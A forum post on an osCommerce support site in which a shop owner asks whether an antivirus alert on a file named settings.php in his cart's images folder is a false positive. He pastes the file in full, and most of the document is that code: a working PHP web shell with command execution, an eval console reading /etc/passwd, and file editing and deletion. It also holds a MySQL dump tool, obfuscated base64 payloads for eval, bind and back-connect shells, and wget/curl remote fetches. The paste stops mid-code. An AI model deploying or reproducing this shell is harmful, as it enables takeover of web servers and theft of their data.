Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

PHP virus settings.php


qwertyjjj

Recommended Posts

I do a weekly backup of my site to my local hard drive.

As I was making the backup this week, the following came up in Avira:

Begin scan in 'C:\Documents and Settings\J\My Documents\Website backups\mywebsite.co.uk\cart\images\settings.php'

C:\Documents and Settings\J\My Documents\Website backups\mywebsite.co.uk\cart\images\settings.php

[DETECTION] Contains recognition pattern of the PHP/Agent.40569 PHP virus

 

Is this a false positive ?

It seems to be set to 777. I have changed it to 000 and put exit() at the top of the script as a temporary measure.

 

These are the contents:

<?php

if(isset($_GET['dl']) && ($_GET['dl'] != ""))
{
   $file = $_GET['dl'];
   $filez = @file_get_contents($file);
   header("Content-type: application/octet-stream");
   header("Content-length: ".strlen($filez));
   header("Content-disposition: attachment; filename=\"".basename($file)."\";");
   echo $filez;
   exit;
}elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
{
   $file = $_GET['dlgzip'];
   $filez = gzencode(@file_get_contents($file));
   header("Content-Type:application/x-gzip\n");
   header("Content-length: ".strlen($filez));
   header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
   echo $filez;
   exit;
}
if(isset($_GET['img']))
{
   @ob_clean();
   $d = magicboom($_GET['y']);
   $f = $_GET['img'];
   $inf = @getimagesize($d.$f);
   $ext = explode($f,".");
   $ext = $ext[count($ext)-1];
   @header("Content-type: ".$inf["mime"]);
   @header("Cache-control: public");
   @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
   @header("Cache-control: max-age=".(60*60*24*7));
   @readfile($d.$f);
   exit;
}
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
   $safemode = TRUE;
else
   $safemode = FALSE;
   $system = @php_uname();

if(strtolower(substr($system,0,3)) == "win")
   $win = TRUE;
else
   $win = FALSE;

if(isset($_GET['y']))
{
   if(@is_dir($_GET['view']))
   {
       $pwd = $_GET['view'];
       @chdir($pwd);
   } else
   {
       $pwd = $_GET['y'];
       @chdir($pwd);
   }
}

if(!$win)
{
   if(!$user = rapih(exe("whoami")))
       $user = "";
   if(!$id = rapih(exe("id")))
       $id = "";

       $prompt = $user." \$ ";
       $pwd = @getcwd().DIRECTORY_SEPARATOR;
}else
{
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$sort_default = "0a";
$sort_save = TRUE;

   $user = @get_current_user();
   $id = $user;
   $prompt = $user." >";
   $pwd = realpath(".")."\\";
   $v = explode("\\",$d);
   $v = $v[0];
   foreach (range("A","Z") as $letter)
   {
       $bool = @is_dir($letter.":\\");
       if ($bool)
       {
           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
           if ($letter.":" != $v)
               {$letters .= $letter;}
           else
               {$letters .= "<span class=\"gaya\">".$letter."</span>";}

           $letters .= " ]</a> ";
       }
   }
}

if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
    $posix = TRUE;
else
    $posix = FALSE;

$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "HERE06";
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
{
   $pathz = "";
   for($j = 0 ; $j <= $i ; $j++)
   { $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; }
   $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}

if(isset($_POST['rename']))
{
   $old = $_POST['oldname'];
   $new = $_POST['newname'];
   @rename($pwd.$old,$pwd.$new);
   $file = $pwd.$new;
}

$buff = $software."<br />";
$buff .= $system."<br />";
if($id != "")
   $buff .= $id."<br />";
$buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />";

if($safemode)
   $buff .= "safemode <span class=\"gaya\">ON</span><br />";
else
   $buff .= "safemode <span class=\"gaya\">OFF<span><br />";

$buff .= $letters." > ".$pwdurl;

function rapih($text)
{
   return trim(str_replace("<br />","",$text));
}

function magicboom($text)
{
   if (!get_magic_quotes_gpc())
   { return $text; }
   return stripslashes($text);
}

function showdir($pwd,$prompt)
{
@set_time_limit(0);
eval(gzinflate(base64_decode('hZLfT9swEID/FkIfAPFQC8wLqjRC4wyjmNWxz0mmCeWHVdZcW1NQW+1hf/vsSNtUiYoHSz5/5/vunIxw0tRv9ub6ubPturNnUY6SZykv5Cr+KRd4Y7AlWeJ0XnSPkFAWeEfY18y8vMBV96aMWzUJeZ2Zvah7NzYI9w1xZb7cC8mQlNCSxnAKBYoagOoCwWoyDXHT063B7rod/62PVKWB0/QJZA69KzRWvEko5KH+UnLoq1zDfFezGDJgwb8IXA/+EL+Lf/0gX4KKjSbVBlA8Aqumw3xEpBoB/HwcpuwJtPergbNP/MrHKSA3CqHMoFKaiJBPQbF8Rg7nq4mj5eJh1yTjnRz646Rc9XsLrpytBIIe+ufd4I/LzHvB7GuJ4Hw9Gd5LLeI1QJXOlpWSCjX0hz4V/MgcFJ3Uuf4l7/26m0yi89sRTuzGzp831mHd+m97Gl1GD/PocoQfwN8eVkasm92RhO8XP3zKt2P3TwK8OwK/BPN/ePjPhUO7rXHY/AE=')));

   $fname = array();
   $dname = array();
   if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
       $posix = TRUE;
   else
       $posix = FALSE;
   $user = "????:????";
   if($dh = opendir($pwd))
   {
       while($file = readdir($dh))
       {
           if(is_dir($file))
           {
               $dname[] = $file;
           } elseif(is_file($file))
           { $fname[] = $file; }
       }
       closedir($dh);
   }

sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";

if($tree > 2)
   for($i=0;$i<$tree-2;$i++)
   $parent .= $path[$i].DIRECTORY_SEPARATOR;
else
   $parent = $pwd;
   foreach($dname as $folder)
   {
       if($folder == ".")
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
           { $owner = $user; }
           $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
       } elseif($folder == "..")
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
           { $owner = $user; }

           $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
       } else
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
               { $owner = $user; }
           $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
       }
   }
   foreach($fname as $file)
   {
       $full = $pwd.$file;
       if(!$win && $posix)
       {
           $name=@posix_getpwuid(@fileowner($file));
           $group=@posix_getgrgid(@filegroup($file));
           $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
       } else
           { $owner = $user; }

       $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
   }

   $buff .= "</table>"; return $buff;
}

function ukuran($file)
{
   if($size = @filesize($file))
   {
       if($size <= 1024)
       return $size;
       else
       {
           if($size <= 1024*1024)
           {
               $size = @round($size / 1024,2);; return "$size kb";
           } else
           {
               $size = @round($size / 1024 / 1024,2);
               return "$size mb";
           }
       }
   } else return "???";
}

function exe($cmd)
{
   if(function_exists('system'))
   {
       @ob_start();
       @system($cmd);
       $buff = @ob_get_contents();
       @ob_end_clean();
       return $buff;
   } elseif(function_exists('exec'))
   {
       @exec($cmd,$results);
       $buff = "";
       foreach($results as $result){ $buff .= $result; } return $buff;
   } elseif(function_exists('passthru'))
   {
       @ob_start();
       @passthru($cmd);
       $buff = @ob_get_contents();
       @ob_end_clean();
       return $buff;
   } elseif(function_exists('shell_exec'))
   {
       $buff = @shell_exec($cmd);
       return $buff;
   }
}

function tulis($file,$text)
{
   $textz = gzinflate(base64_decode($text));
   if($filez = @fopen($file,"w"))
   {
       @fputs($filez,$textz);
       @fclose($file);
   }
}

function ambil($link,$file)
{
   if($fp = @fopen($link,"r"))
   {
       while(!feof($fp))
       {
           $cont.= @fread($fp,1024);
       }
       @fclose($fp);
       $fp2 = @fopen($file,"w");
       @fwrite($fp2,$cont);
       @fclose($fp2);
   }
}

function which($pr)
{
   $path = exe("which $pr");
   if(!empty($path))
   {
       return trim($path);
   } else { return trim($pr); }
}

function download($cmd,$url)
{
   $namafile = basename($url);
   switch($cmd)
   {
       case 'wwget':
           exe(which('wget')." ".$url." -O ".$namafile);
       break;
       case 'wlynx':
           exe(which('lynx')." -source ".$url." > ".$namafile);
       break;
       case 'wfread' :
           ambil($wurl,$namafile);
       break;
       case 'wfetch' :
           exe(which('fetch')." -o ".$namafile." -p ".$url);
       break;
       case 'wlinks' :
           exe(which('links')." -source ".$url." > ".$namafile);
       break;
       case 'wget' :
           exe(which('GET')." ".$url." > ".$namafile);
       break;
       case 'wcurl' :
           exe(which('curl')." ".$url." -o ".$namafile);
       break;
       default: break;
   }
   return $namafile;
}

function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>.::ir4dex::.</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">su<span class="b2">b</span>zid</span></a></td></tr><tr><td>shell <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a>  <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a><a href="http://here06.info" target="_blank"http://here06.info" target="_blank">HERE06</a></div> <!-- menu end --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS here06_table;\nCREATE TABLE `here06_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE here06_table;SELECT * FROM here06_table;\nDROP TABLE IF EXISTS here06_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";   <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; 